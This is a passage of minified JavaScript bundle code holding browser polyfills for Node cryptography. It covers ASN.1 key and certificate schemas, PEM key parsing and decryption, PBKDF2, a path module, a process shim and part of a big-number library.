I=ie.define("AlgorithmIdentifier",function(){this.seq().obj(this.key("algorithm").objid(),this.key("none").null_().optional(),this.key("curve").objid().optional(),this.key("params").seq().obj(this.key("p").int(),this.key("q").int(),this.key("g").int()).optional())}),Q=ie.define("PrivateKeyInfo",function(){this.seq().obj(this.key("version").int(),this.key("algorithm").use(I),this.key("subjectPrivateKey").octstr())});we.PrivateKey=Q;var F=ie.define("EncryptedPrivateKeyInfo",function(){this.seq().obj(this.key("algorithm").seq().obj(this.key("id").objid(),this.key("decrypt").seq().obj(this.key("kde").seq().obj(this.key("id").objid(),this.key("kdeparams").seq().obj(this.key("salt").octstr(),this.key("iters").int())),this.key("cipher").seq().obj(this.key("algo").objid(),this.key("iv").octstr()))),this.key("subjectPrivateKey").octstr())});we.EncryptedPrivateKey=F;var E=ie.define("DSAPrivateKey",function(){this.seq().obj(this.key("version").int(),this.key("p").int(),this.key("q").int(),this.key("g").int(),this.key("pub_key").int(),this.key("priv_key").int())});we.DSAPrivateKey=E,we.DSAparam=ie.define("DSAparam",function(){this.int()});var g=ie.define("ECPrivateKey",function(){this.seq().obj(this.key("version").int(),this.key("privateKey").octstr(),this.key("parameters").optional().explicit(0).use(b),this.key("publicKey").optional().explicit(1).bitstr())});we.ECPrivateKey=g;var b=ie.define("ECParameters",function(){this.choice({namedCurve:this.objid()})});we.signature=ie.define("signature",function(){this.seq().obj(this.key("r").int(),this.key("s").int())})},3223:(Pe,we,de)=>{"use strict";var ie=de(7758),j=ie.define("Time",function(){this.choice({utcTime:this.utctime(),generalTime:this.gentime()})}),$=ie.define("AttributeTypeValue",function(){this.seq().obj(this.key("type").objid(),this.key("value").any())}),ae=ie.define("AlgorithmIdentifier",function(){this.seq().obj(this.key("algorithm").objid(),this.key("parameters").optional(),this.key("curve").objid().optional())}),I=ie.define("SubjectPublicKeyInfo",function(){this.seq().obj(this.key("algorithm").use(ae),this.key("subjectPublicKey").bitstr())}),Q=ie.define("RelativeDistinguishedName",function(){this.setof($)}),F=ie.define("RDNSequence",function(){this.seqof(Q)}),E=ie.define("Name",function(){this.choice({rdnSequence:this.use(F)})}),g=ie.define("Validity",function(){this.seq().obj(this.key("notBefore").use(j),this.key("notAfter").use(j))}),b=ie.define("Extension",function(){this.seq().obj(this.key("extnID").objid(),this.key("critical").bool().def(!1),this.key("extnValue").octstr())}),_=ie.define("TBSCertificate",function(){this.seq().obj(this.key("version").explicit(0).int().optional(),this.key("serialNumber").int(),this.key("signature").use(ae),this.key("issuer").use(E),this.key("validity").use(g),this.key("subject").use(E),this.key("subjectPublicKeyInfo").use(I),this.key("issuerUniqueID").implicit(1).bitstr().optional(),this.key("subjectUniqueID").implicit(2).bitstr().optional(),this.key("extensions").explicit(3).seqof(b).optional())}),y=ie.define("X509Certificate",function(){this.seq().obj(this.key("tbsCertificate").use(_),this.key("signatureAlgorithm").use(ae),this.key("signatureValue").bitstr())});Pe.exports=y},5104:(Pe,we,de)=>{var ie=/Proc-Type: 4,ENCRYPTED[\n\r]+DEK-Info: AES-((?:128)|(?:192)|(?:256))-CBC,([0-9A-H]+)[\n\r]+([0-9A-z\n\r+/=]+)[\n\r]+/m,j=/^-----BEGIN ((?:.*? KEY)|CERTIFICATE)-----/m,$=/^-----BEGIN ((?:.*? KEY)|CERTIFICATE)-----([0-9A-z\n\r+/=]+)-----END \1-----$/m,ae=de(1851),I=de(8931),Q=de(265).Buffer;Pe.exports=function(F,E){var _,g=F.toString(),b=g.match(ie);if(b){var M="aes"+b[1],p=Q.from(b[2],"hex"),D=Q.from(b[3].replace(/[\r\n]/g,""),"base64"),w=ae(E,p.slice(0,8),parseInt(b[1],10)).key,x=[],S=I.createDecipheriv(M,w,p);x.push(S.update(D)),x.push(S.final()),_=Q.concat(x)}else{var y=g.match($);_=Q.from(y[2].replace(/[\r\n]/g,""),"base64")}return{tag:g.match(j)[1],data:_}}},3262:(Pe,we,de)=>{var ie=de(7934),j=de(2562),$=de(5104),ae=de(8931),I=de(8597),Q=de(265).Buffer;function F(g){var b;"object"==typeof g&&!Q.isBuffer(g)&&(b=g.passphrase,g=g.key),"string"==typeof g&&(g=Q.from(g));var p,D,_=$(g,b),y=_.tag,M=_.data;switch(y){case"CERTIFICATE":D=ie.certificate.decode(M,"der").tbsCertificate.subjectPublicKeyInfo;case"PUBLIC KEY":switch(D||(D=ie.PublicKey.decode(M,"der")),p=D.algorithm.algorithm.join(".")){case"1.2.840.113549.1.1.1":return ie.RSAPublicKey.decode(D.subjectPublicKey.data,"der");case"1.2.840.10045.2.1":return D.subjectPrivateKey=D.subjectPublicKey,{type:"ec",data:D};case"1.2.840.10040.4.1":return D.algorithm.params.pub_key=ie.DSAparam.decode(D.subjectPublicKey.data,"der"),{type:"dsa",data:D.algorithm.params};default:throw new Error("unknown key id "+p)}case"ENCRYPTED PRIVATE KEY":M=function E(g,b){var _=g.algorithm.decrypt.kde.kdeparams.salt,y=parseInt(g.algorithm.decrypt.kde.kdeparams.iters.toString(),10),M=j[g.algorithm.decrypt.cipher.algo.join(".")],p=g.algorithm.decrypt.cipher.iv,D=g.subjectPrivateKey,w=parseInt(M.split("-")[1],10)/8,x=I.pbkdf2Sync(b,_,y,w,"sha1"),S=ae.createDecipheriv(M,x,p),O=[];return O.push(S.update(D)),O.push(S.final()),Q.concat(O)}(M=ie.EncryptedPrivateKey.decode(M,"der"),b);case"PRIVATE KEY":switch(p=(D=ie.PrivateKey.decode(M,"der")).algorithm.algorithm.join(".")){case"1.2.840.113549.1.1.1":return ie.RSAPrivateKey.decode(D.subjectPrivateKey,"der");case"1.2.840.10045.2.1":return{curve:D.algorithm.curve,privateKey:ie.ECPrivateKey.decode(D.subjectPrivateKey,"der").privateKey};case"1.2.840.10040.4.1":return D.algorithm.params.priv_key=ie.DSAparam.decode(D.subjectPrivateKey,"der"),{type:"dsa",params:D.algorithm.params};default:throw new Error("unknown key id "+p)}case"RSA PUBLIC KEY":return ie.RSAPublicKey.decode(M,"der");case"RSA PRIVATE KEY":return ie.RSAPrivateKey.decode(M,"der");case"DSA PRIVATE KEY":return{type:"dsa",params:ie.DSAPrivateKey.decode(M,"der")};case"EC PRIVATE KEY":return{curve:(M=ie.ECPrivateKey.decode(M,"der")).parameters.value,privateKey:M.privateKey};default:throw new Error("unknown key type "+y)}}Pe.exports=F,F.signature=ie.signature},7313:(Pe,we,de)=>{"use strict";var ie=de(5486);function j(Q){if("string"!=typeof Q)throw new TypeError("Path must be a string. Received "+JSON.stringify(Q))}function $(Q,F){for(var y,E="",g=0,b=-1,_=0,M=0;M<=Q.length;++M){if(M<Q.length)y=Q.charCodeAt(M);else{if(47===y)break;y=47}if(47===y){if(b!==M-1&&1!==_)if(b!==M-1&&2===_){if(E.length<2||2!==g||46!==E.charCodeAt(E.length-1)||46!==E.charCodeAt(E.length-2))if(E.length>2){var p=E.lastIndexOf("/");if(p!==E.length-1){-1===p?(E="",g=0):g=(E=E.slice(0,p)).length-1-E.lastIndexOf("/"),b=M,_=0;continue}}else if(2===E.length||1===E.length){E="",g=0,b=M,_=0;continue}F&&(E.length>0?E+="/..":E="..",g=2)}else E.length>0?E+="/"+Q.slice(b+1,M):E=Q.slice(b+1,M),g=M-b-1;b=M,_=0}else 46===y&&-1!==_?++_:_=-1}return E}var I={resolve:function(){for(var g,F="",E=!1,b=arguments.length-1;b>=-1&&!E;b--){var _;b>=0?_=arguments[b]:(void 0===g&&(g=ie.cwd()),_=g),j(_),0!==_.length&&(F=_+"/"+F,E=47===_.charCodeAt(0))}return F=$(F,!E),E?F.length>0?"/"+F:"/":F.length>0?F:"."},normalize:function(F){if(j(F),0===F.length)return".";var E=47===F.charCodeAt(0),g=47===F.charCodeAt(F.length-1);return 0===(F=$(F,!E)).length&&!E&&(F="."),F.length>0&&g&&(F+="/"),E?"/"+F:F},isAbsolute:function(F){return j(F),F.length>0&&47===F.charCodeAt(0)},join:function(){if(0===arguments.length)return".";for(var F,E=0;E<arguments.length;++E){var g=arguments[E];j(g),g.length>0&&(void 0===F?F=g:F+="/"+g)}return void 0===F?".":I.normalize(F)},relative:function(F,E){if(j(F),j(E),F===E||(F=I.resolve(F))===(E=I.resolve(E)))return"";for(var g=1;g<F.length&&47===F.charCodeAt(g);++g);for(var b=F.length,_=b-g,y=1;y<E.length&&47===E.charCodeAt(y);++y);for(var p=E.length-y,D=_<p?_:p,w=-1,x=0;x<=D;++x){if(x===D){if(p>D){if(47===E.charCodeAt(y+x))return E.slice(y+x+1);if(0===x)return E.slice(y+x)}else _>D&&(47===F.charCodeAt(g+x)?w=x:0===x&&(w=0));break}var S=F.charCodeAt(g+x);if(S!==E.charCodeAt(y+x))break;47===S&&(w=x)}var U="";for(x=g+w+1;x<=b;++x)(x===b||47===F.charCodeAt(x))&&(U+=0===U.length?"..":"/..");return U.length>0?U+E.slice(y+w):(47===E.charCodeAt(y+=w)&&++y,E.slice(y))},_makeLong:function(F){return F},dirname:function(F){if(j(F),0===F.length)return".";for(var E=F.charCodeAt(0),g=47===E,b=-1,_=!0,y=F.length-1;y>=1;--y)if(47===(E=F.charCodeAt(y))){if(!_){b=y;break}}else _=!1;return-1===b?g?"/":".":g&&1===b?"//":F.slice(0,b)},basename:function(F,E){if(void 0!==E&&"string"!=typeof E)throw new TypeError('"ext" argument must be a string');j(F);var y,g=0,b=-1,_=!0;if(void 0!==E&&E.length>0&&E.length<=F.length){if(E.length===F.length&&E===F)return"";var M=E.length-1,p=-1;for(y=F.length-1;y>=0;--y){var D=F.charCodeAt(y);if(47===D){if(!_){g=y+1;break}}else-1===p&&(_=!1,p=y+1),M>=0&&(D===E.charCodeAt(M)?-1==--M&&(b=y):(M=-1,b=p))}return g===b?b=p:-1===b&&(b=F.length),F.slice(g,b)}for(y=F.length-1;y>=0;--y)if(47===F.charCodeAt(y)){if(!_){g=y+1;break}}else-1===b&&(_=!1,b=y+1);return-1===b?"":F.slice(g,b)},extname:function(F){j(F);for(var E=-1,g=0,b=-1,_=!0,y=0,M=F.length-1;M>=0;--M){var p=F.charCodeAt(M);if(47!==p)-1===b&&(_=!1,b=M+1),46===p?-1===E?E=M:1!==y&&(y=1):-1!==E&&(y=-1);else if(!_){g=M+1;break}}return-1===E||-1===b||0===y||1===y&&E===b-1&&E===g+1?"":F.slice(E,b)},format:function(F){if(null===F||"object"!=typeof F)throw new TypeError('The "pathObject" argument must be of type Object. Received type '+typeof F);return function ae(Q,F){var E=F.dir||F.root,g=F.base||(F.name||"")+(F.ext||"");return E?E===F.root?E+g:E+Q+g:g}("/",F)},parse:function(F){j(F);var E={root:"",dir:"",base:"",ext:"",name:""};if(0===F.length)return E;var _,g=F.charCodeAt(0),b=47===g;b?(E.root="/",_=1):_=0;for(var y=-1,M=0,p=-1,D=!0,w=F.length-1,x=0;w>=_;--w)if(47!==(g=F.charCodeAt(w)))-1===p&&(D=!1,p=w+1),46===g?-1===y?y=w:1!==x&&(x=1):-1!==y&&(x=-1);else if(!D){M=w+1;break}return-1===y||-1===p||0===x||1===x&&y===p-1&&y===M+1?-1!==p&&(E.base=E.name=F.slice(0===M&&b?1:M,p)):(0===M&&b?(E.name=F.slice(1,y),E.base=F.slice(1,p)):(E.name=F.slice(M,y),E.base=F.slice(M,p)),E.ext=F.slice(y,p)),M>0?E.dir=F.slice(0,M-1):b&&(E.dir="/"),E},sep:"/",delimiter:":",win32:null,posix:null};I.posix=I,Pe.exports=I},8597:(Pe,we,de)=>{we.pbkdf2=de(8266),we.pbkdf2Sync=de(2)},8266:(Pe,we,de)=>{var Q,_,ie=de(265).Buffer,j=de(9552),$=de(5616),ae=de(2),I=de(4964),F=global.crypto&&global.crypto.subtle,E={sha:"SHA-1","sha-1":"SHA-1",sha1:"SHA-1",sha256:"SHA-256","sha-256":"SHA-256",sha384:"SHA-384","sha-384":"SHA-384","sha-512":"SHA-512",sha512:"SHA-512"},g=[];function y(){return _||(_=global.process&&global.process.nextTick?global.process.nextTick:global.queueMicrotask?global.queueMicrotask:global.setImmediate?global.setImmediate:global.setTimeout)}function M(D,w,x,S,O){return F.importKey("raw",D,{name:"PBKDF2"},!1,["deriveBits"]).then(function(U){return F.deriveBits({name:"PBKDF2",salt:w,iterations:x,hash:{name:O}},U,S<<3)}).then(function(U){return ie.from(U)})}Pe.exports=function(D,w,x,S,O,U){"function"==typeof O&&(U=O,O=void 0);var K=E[(O=O||"sha1").toLowerCase()];if(K&&"function"==typeof global.Promise){if(j(x,S),D=I(D,$,"Password"),w=I(w,$,"Salt"),"function"!=typeof U)throw new Error("No callback provided to pbkdf2");!function p(D,w){D.then(function(x){y()(function(){w(null,x)})},function(x){y()(function(){w(x)})})}(function b(D){if(global.process&&!global.process.browser||!F||!F.importKey||!F.deriveBits)return Promise.resolve(!1);if(void 0!==g[D])return g[D];var w=M(Q=Q||ie.alloc(8),Q,10,128,D).then(function(){return!0}).catch(function(){return!1});return g[D]=w,w}(K).then(function(ee){return ee?M(D,w,x,S,K):ae(D,w,x,S,O)}),U)}else y()(function(){var ee;try{ee=ae(D,w,x,S,O)}catch(se){return U(se)}U(null,ee)})}},5616:(Pe,we,de)=>{var j,ie=de(5486);j=global.process&&global.process.browser?"utf-8":global.process&&global.process.version?parseInt(ie.version.split(".")[0].slice(1),10)>=6?"utf-8":"binary":"utf-8",Pe.exports=j},9552:Pe=>{var we=Math.pow(2,30)-1;Pe.exports=function(de,ie){if("number"!=typeof de)throw new TypeError("Iterations not a number");if(de<0)throw new TypeError("Bad iterations");if("number"!=typeof ie)throw new TypeError("Key length not a number");if(ie<0||ie>we||ie!=ie)throw new TypeError("Bad key length")}},2:(Pe,we,de)=>{var ie=de(6853),j=de(1447),$=de(6890),ae=de(265).Buffer,I=de(9552),Q=de(5616),F=de(4964),E=ae.alloc(128),g={md5:16,sha1:20,sha224:28,sha256:32,sha384:48,sha512:64,rmd160:20,ripemd160:20};function b(M,p,D){var w=function _(M){return"rmd160"===M||"ripemd160"===M?function D(w){return(new j).update(w).digest()}:"md5"===M?ie:function p(w){return $(M).update(w).digest()}}(M),x="sha512"===M||"sha384"===M?128:64;p.length>x?p=w(p):p.length<x&&(p=ae.concat([p,E],x));for(var S=ae.allocUnsafe(x+g[M]),O=ae.allocUnsafe(x+g[M]),U=0;U<x;U++)S[U]=54^p[U],O[U]=92^p[U];var K=ae.allocUnsafe(x+D+4);S.copy(K,0,0,x),this.ipad1=K,this.ipad2=S,this.opad=O,this.alg=M,this.blocksize=x,this.hash=w,this.size=g[M]}b.prototype.run=function(M,p){return M.copy(p,this.blocksize),this.hash(p).copy(this.opad,this.blocksize),this.hash(this.opad)},Pe.exports=function y(M,p,D,w,x){I(D,w);var S=new b(x=x||"sha1",M=F(M,Q,"Password"),(p=F(p,Q,"Salt")).length),O=ae.allocUnsafe(w),U=ae.allocUnsafe(p.length+4);p.copy(U,0,0,p.length);for(var K=0,ee=g[x],se=Math.ceil(w/ee),ve=1;ve<=se;ve++){U.writeUInt32BE(ve,p.length);for(var le=S.run(U,S.ipad1),ye=le,z=1;z<D;z++){ye=S.run(ye,S.ipad2);for(var l=0;l<ee;l++)le[l]^=ye[l]}le.copy(O,K),K+=ee}return O}},4964:(Pe,we,de)=>{var ie=de(265).Buffer;Pe.exports=function(j,$,ae){if(ie.isBuffer(j))return j;if("string"==typeof j)return ie.from(j,$);if(ArrayBuffer.isView(j))return ie.from(j.buffer);throw new TypeError(ae+" must be a string, a Buffer, a typed array or a DataView")}},5486:Pe=>{var de,ie,we=Pe.exports={};function j(){throw new Error("setTimeout has not been defined")}function $(){throw new Error("clearTimeout has not been defined")}function ae(p){if(de===setTimeout)return setTimeout(p,0);if((de===j||!de)&&setTimeout)return de=setTimeout,setTimeout(p,0);try{return de(p,0)}catch(D){try{return de.call(null,p,0)}catch(w){return de.call(this,p,0)}}}!function(){try{de="function"==typeof setTimeout?setTimeout:j}catch(p){de=j}try{ie="function"==typeof clearTimeout?clearTimeout:$}catch(p){ie=$}}();var E,Q=[],F=!1,g=-1;function b(){!F||!E||(F=!1,E.length?Q=E.concat(Q):g=-1,Q.length&&_())}function _(){if(!F){var p=ae(b);F=!0;for(var D=Q.length;D;){for(E=Q,Q=[];++g<D;)E&&E[g].run();g=-1,D=Q.length}E=null,F=!1,function I(p){if(ie===clearTimeout)return clearTimeout(p);if((ie===$||!ie)&&clearTimeout)return ie=clearTimeout,clearTimeout(p);try{ie(p)}catch(D){try{return ie.call(null,p)}catch(w){return ie.call(this,p)}}}(p)}}function y(p,D){this.fun=p,this.array=D}function M(){}we.nextTick=function(p){var D=new Array(arguments.length-1);if(arguments.length>1)for(var w=1;w<arguments.length;w++)D[w-1]=arguments[w];Q.push(new y(p,D)),1===Q.length&&!F&&ae(_)},y.prototype.run=function(){this.fun.apply(null,this.array)},we.title="browser",we.browser=!0,we.env={},we.argv=[],we.version="",we.versions={},we.on=M,we.addListener=M,we.once=M,we.off=M,we.removeListener=M,we.removeAllListeners=M,we.emit=M,we.prependListener=M,we.prependOnceListener=M,we.listeners=function(p){return[]},we.binding=function(p){throw new Error("process.binding is not supported")},we.cwd=function(){return"/"},we.chdir=function(p){throw new Error("process.chdir is not supported")},we.umask=function(){return 0}},8831:(Pe,we,de)=>{we.publicEncrypt=de(1599),we.privateDecrypt=de(8064),we.privateEncrypt=function(j,$){return we.publicEncrypt(j,$,!0)},we.publicDecrypt=function(j,$){return we.privateDecrypt(j,$,!0)}},7489:(Pe,we,de)=>{var ie=de(2161),j=de(265).Buffer;function $(ae){var I=j.allocUnsafe(4);return I.writeUInt32BE(ae,0),I}Pe.exports=function(ae,I){for(var E,Q=j.alloc(0),F=0;Q.length<I;)E=$(F++),Q=j.concat([Q,ie("sha1").update(ae).update(E).digest()]);return Q.slice(0,I)}},3355:function(Pe,we,de){!function(ie,j){"use strict";function $(z,l){if(!z)throw new Error(l||"Assertion failed")}function ae(z,l){z.super_=l;var f=function(){};f.prototype=l.prototype,z.prototype=new f,z.prototype.constructor=z}function I(z,l,f){if(I.isBN(z))return z;this.negative=0,this.words=null,this.length=0,this.red=null,null!==z&&(("le"===l||"be"===l)&&(f=l,l=10),this._init(z||0,l||10,f||"be"))}var Q;"object"==typeof ie?ie.exports=I:j.BN=I,I.BN=I,I.wordSize=26;try{Q="undefined"!=typeof window&&void 0!==window.Buffer?window.Buffer:de(7108).Buffer}catch(z){}function F(z,l){var f=z.charCodeAt(l);return f>=65&&f<=70?f-55:f>=97&&f<=102?f-87:f-48&15}function E(z,l,f){var A=F(z,f);return f-1>=l&&(A|=F(z,f-1)<<4),A}function g(z,l,f,A){for(var v=0,P=Math.min(z.length,f),G=l;G<P;G++){var X=z.charCodeAt(G)-48;v*=A,v+=X>=49?X-49+10:X>=17?X-17+10:X}return v}I.isBN=function(l){return l instanceof I||null!==l&&"object"==typeof l&&l.constructor.wordSize===I.wordSize&&Array.isArray(l.words)},I.max=function(l,f){return l.cmp(f)>0?l:f},I.min=function(l,f){return l.cmp(f)<0?l:f},I.prototype._init=function(l,f,A){if("number"==typeof l)return this._initNumber(l,f,A);if("object"==typeof l)return this._initArray(l,f,A);"hex"===f&&(f=16),$(f===(0|f)&&f>=2&&f<=36);var v=0;"-"===(l=l.toString().replace(/\s+/g,""))[0]&&(v++,this.negative=1),v<l.length&&(16===f?this._parseHex(l,v,A):(this._parseBase(l,f,v),"le"===A&&this._initArray(this.toArray(),f,A)))},I.prototype._initNumber=function(l,f,A){l<0&&(this.negative=1,l=-l),l<67108864?(this.words=[67108863&l],this.length=1):l<4503599627370496?(this.words=[67108863&l,l/67108864&67108863],this.length=2):($(l<9007199254740992),this.words=[67108863&l,l/67108864&67108863,1],this.length=3),"le"===A&&this._initArray(this.toArray(),f,A)},I.prototype._initArray=function(l,f,A){if($("number"==typeof l.length),l.length<=0)return this.words=[0],this.length=1,this;this.length=Math.ceil(l.length/3),this.words=new Array(this.length);for(var v=0;v<this.length;v++)this.words[v]=0;var P,G,X=0;if("be"===A)for(v=l.length-1,P=0;v>=0;v-=3)this.words[P]|=(G=l[v]|l[v-1]<<8|l[v-2]<<16)<<X&67108863,this.words[P+1]=G>>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);else if("le"===A)for(v=0,P=0;v<l.length;v+=3)this.words[P]|=(G=l[v]|l[v+1]<<8|l[v+2]<<16)<<X&67108863,this.words[P+1]=G>>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);return this.strip()},I.prototype._parseHex=function(l,f,A){this.length=Math.ceil((l.length-f)/6),this.words=new Array(this.length);for(var v=0;v<this.length;v++)this.words[v]=0;var X,P=0,G=0;if("be"===A)for(v=l.length-1;v>=f;v-=2)X=E(l,f,v)<<P,this.words[G]|=67108863&X,P>=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;else for(v=(l.length-f)%2==0?f+1:f;v<l.length;v+=2)X=E(l,f,v)<<P,this.words[G]|=67108863&X,P>=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;this.strip()},I.prototype._parseBase=function(l,f,A){this.words=[0],this.length=1;for(var v=0,P=1;P<=67108863;P*=f)v++;v--,P=P/f|0;for(var G=l.length-A,X=G%v,L=Math.min(G,G-X)+A,h=0,R=A;R<L;R+=v)h=g(l,R,R+v,f),this.imuln(P),this.words[0]+h<67108864?this.words[0]+=h:this._iaddn(h);if(0!==X){var J=1;for(h=g(l,R,l.length,f),R=0;R<X;R++)J*=f;this.imuln(J),this.words[0]+h<67108864?this.words[0]+=h:this._iaddn(h)}this.strip()},I.prototype.copy=function(l){l.words=new Array(this.length);for(var f=0;f<this.length;f++)l.words[f]=this.words[f];l.length=this.length,l.negative=this.negative,l.red=this.red},I.prototype.clone=function(){var l=new I(null);return this.copy(l),l},I.prototype._expand=function(l){for(;this.length<l;)this.words[this.length++]=0;return this},I.prototype.strip=function(){for(;this.length>1&&0===this.words[this.length-1];)this.length--;return this._normSign()},I.prototype._normSign=function(){return 1===this.length&&0===this.words[0]&&(this.negative=0),this},I.prototype.inspect=function(){return(this.red?"<BN-R: ":"<BN: ")+this.toString(16)+">"};var b=["","0","00","000","0000","00000","000000","0000000","00000000","000000000","0000000000","00000000000","000000000000","0000000000000","00000000000000","000000000000000","0000000000000000","00000000000000000","000000000000000000","0000000000000000000","00000000000000000000","000000000000000000000","0000000000000000000000","00000000000000000000000","000000000000000000000000","0000000000000000000000000"],_=[0,0,25,16,12,11,10,9,8,8,7,7,7,7,6,6,6,6,6,6,6,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5],y=[0,0,33554432,43046721,16777216,48828125,60466176,40353607,16777216,43046721,1e7,19487171,35831808,62748517,7529536,11390625,16777216,24137569,34012224,47045881,64e6,4084101,5153632,6436343,7962624,9765625,11881376,14348907,17210368,20511149,243e5,28629151,33554432,39135393,45435424,52521875,60466176];function p(z,l,f){f.negative=l.negative^z.negative;var A=z.length+l.length|0;f.length=A,A=A-1|0;var v=0|z.words[0],P=0|l.words[0],G=v*P,L=G/67108864|0;f.words[0]=67108863&G;for(var h=1;h<A;h++){for(var R=L>>>26,J=67108863&L,Z=Math.min(h,l.length-1),ue=Math.max(0,h-z.length+1);ue<=Z;ue++)R+=(G=(v=0|z.words[h-ue|0])*(P=0|l.words[ue])+J)/67108864|0,J=67108863&G;f.words[h]=0|J,L=0|R}return 0!==L?f.words[h]=0|L:f.length--,f.strip()}I.prototype.toString=function(l,f){var A;if(f=0|f||1,16===(l=l||10)||"hex"===l){A="";for(var v=0,P=0,G=0;G<this.length;G++){var X=this.words[G],L=(16777215&(X<<v|P)).toString(16);A=0!=(P=X>>>24-v&16777215)||G!==this.length-1?b[6-L.length]+L+A:L+A,(v+=2)>=26&&(v-=26,G--)}for(0!==P&&(A=P.toString(16)+A);A.length%f!=0;)A="0"+A;return 0!==this.negative&&(A="-"+A),A}if(l===(0|l)&&l>=2&&l<=36){var h=_[l],R=y[l];A="";var J=this.clone();for(J.negative=0;!J.isZero();){var Z=J.modn(R).toString(l);A=(J=J.idivn(R)).isZero()?Z+A:b[h-Z.length]+Z+A}for(this.isZero()&&(A="0"+A);A.length%f!=0;)A="0"+A;return 0!==this.negative&&(A="-"+A),A}$(!1,"Base should be between 2 and 36")},I.prototype.toNumber=function(){var l=this.words[0];return 2===this.length?l+=67108864*this.words[1]:3===this.length&&1===this.words[2]?l+=4503599627370496+67108864*this.words[1]:this.length>2&&$(!1,"Number can only safely store up to 53 bits"),0!==this.negative?-l:l},I.prototype.toJSON=function(){return this.toString(16)},I.prototype.toBuffer=function(l,f){return $(void 0!==Q),this.toArrayLike(Q,l,f)},I.prototype.toArray=function(l,f){return this.toArrayLike(Array,l,f)},I.prototype.toArrayLike=function(l,f,A){var v=this.byteLength(),P=A||Math.max(1,v);$(v<=P,"byte array longer than desired length"),$(P>0,"Requested array length <= 0"),this.strip();var L,h,G="le"===f,X=new l(P),R=this.clone();if(G){for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[h]=L;for(;h<P;h++)X[h]=0}else{for(h=0;h<P-v;h++)X[h]=0;for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[P-h-1]=L}return X},I.prototype._countBits=Math.clz32?function(l){return 32-Math.clz32(l)}:function(l){var f=l,A=0;return f>=4096&&(A+=13,f>>>=13),f>=64&&(A+=7,f>>>=7),f>=8&&(A+=4,f>>>=4),f>=2&&(A+=2,f>>>=2),A+f},I.prototype._zeroBits=function(l){if(0===l)return 26;var f=l,A=0;return 0==(8191&f)&&(A+=13,f>>>=13),0==(127&f)&&(A+=7,f>>>=7),0==(15&f)&&(A+=4,f>>>=4),0==(3&f)&&(A+=2,f>>>=2),0==(1&f)&&A++,A},I.prototype.bitLength=function(){var f=this._countBits(this.words[this.length-1]);return 26*(this.length-1)+f},I.prototype.zeroBits=function(){if(this.isZero())return 0;for(var l=0,f=0;f<this.length;f++){var A=this._zeroBits(this.words[f]);if(l+=A,26!==A)break}return l},I.prototype.byteLength=function(){return Math.ceil(this.bitLength()/8)},I.prototype.toTwos=function(l){return 0!==this.negative?this.abs().inotn(l).iaddn(1):this.clone()},I.prototype.fromTwos=function(l){return this.testn(l-1)?this.notn(l).iaddn(1).ineg():this.clone()},I.prototype.isNeg=function(){return 0!==this.negative},I.prototype.neg=function(){return this.clone().ineg()},I.prototype.ineg=function(){return this.isZero()||(this.negative^=1),this},I.prototype.iuor=function(l){for(;this.length<l.length;)this.words[this.length++]=0;for(var f=0;f<l.length;f++)this.words[f]=this.words[f]|l.words[f];return this.strip()},I.prototype.ior=function(l){return $(0==(this.negative|l.negative)),this.iuor(l)},I.prototype.or=function(l){return this.length>l.length?this.clone().ior(l):l.clone().ior(this)},I.prototype.uor=function(l){return this.length>l.length?this.clone().iuor(l):l.clone().iuor(this)},I.prototype.iuand=function(l){var f;f=this.length>l.length?l:this;for(var A=0;A<f.length;A++)this.words[A]=this.words[A]&l.words[A];return this.length=f.length,this.strip()},I.prototype.iand=function(l){return $(0==(this.negative|l.negative)),this.iuand(l)},I.prototype.and=function(l){return this.length>l.length?this.clone().iand(l):l.clone().iand(this)},I.prototype.uand=function(l){return this.length>l.length?this.clone().iuand(l):l.clone().iuand(this)},I.prototype.iuxor=function(l){var f,A;this.length>l.length?(f=this,A=l):(f=l,A=this);for(var v=0;v<A.length;v++)this.words[v]=f.words[v]^A.words[v];if(this!==f)for(;v<f.length;v++)this.words[v]=f.words[v];return this.length=f.length,this.strip()},I.prototype.ixor=function(l){return $(0==(this.negative|l.negative)),this.iuxor(l)},I.prototype.xor=function(l){return this.length>l.length?this.clone().ixor(l):l.clone().ixor(this)},I.prototype.uxor=function(l){return this.length>l.length?this.clone().iuxor(l):l.clone().iuxor(this)},I.prototype.inotn=function(l){$("number"==typeof l&&l>=0);var f=0|Math.ceil(l/26),A=l%26;this._expand(f),A>0&&f--;for(var v=0;v<f;v++)this.words[v]=67108863&~this.words[v];return A>0&&(this.words[v]=~this.words[v]&67108863>>26-A),this.strip()},I.prototype.notn=function(l){return this.clone().inotn(l)},I.prototype.setn=function(l,f){$("number"==typeof l&&l>=0);var A=l/26|0,v=l%26;return this._expand(A+1),this.words[A]=f?this.words[A]|1<<v:this.words[A]&~(1<<v),this.strip()},I.prototype.iadd=function(l){var f,A,v;if(0!==this.negative&&0===l.negative)return this.negative=0,f=this.isub(l),this.negative^=1,this._normSign();if(0===this.negative&&0!==l.negative)return l.negative=0,f=this.isub(l),l.negative=1,f._normSign();this.length>l.length?(A=this,v=l):(A=l,v=this);for(var P=0,G=0;G<v.length;G++)this.words[G]=67108863&(f=(0|A.words[G])+(0|v.words[G])+P),P=f>>>26;for(;0!==P&&G<A.length;G++)this.words[G]=67108863&(f=(0|A.words[G])+P),P=f>>>26;if(this.length=A.length,0!==P)this.words[this.length]=P,this.length++;else if(A!==this)for(;G<A.length;G++)this.words[G]=A.words[G];return this},I.prototype.add=function(l){var f;return 0!==l.negative&&0===this.negative?(l.negative=0,f=this.sub(l),l.negative^=1,f):0===l.negative&&0!==this.negative?(this.negative=0,f=l.sub(this),this.negative=1,f):this.length>l.length?this.clone().iadd(l):l.clone().iadd(this)},I.prototype.isub=function(l){if(0!==l.negative){l.negative=0;var f=this.iadd(l);return l.negative=1,f._normSign()}if(0!==this.negative)return this.negative=0,this.iadd(l),this.negative=1,this._normSign();var v,P,A=this.cmp(l);if(0===A)return this.negative=0,this.length=1,this.words[0]=0,this;A>0?(v=this,P=l):(v=l,P=this);for(var 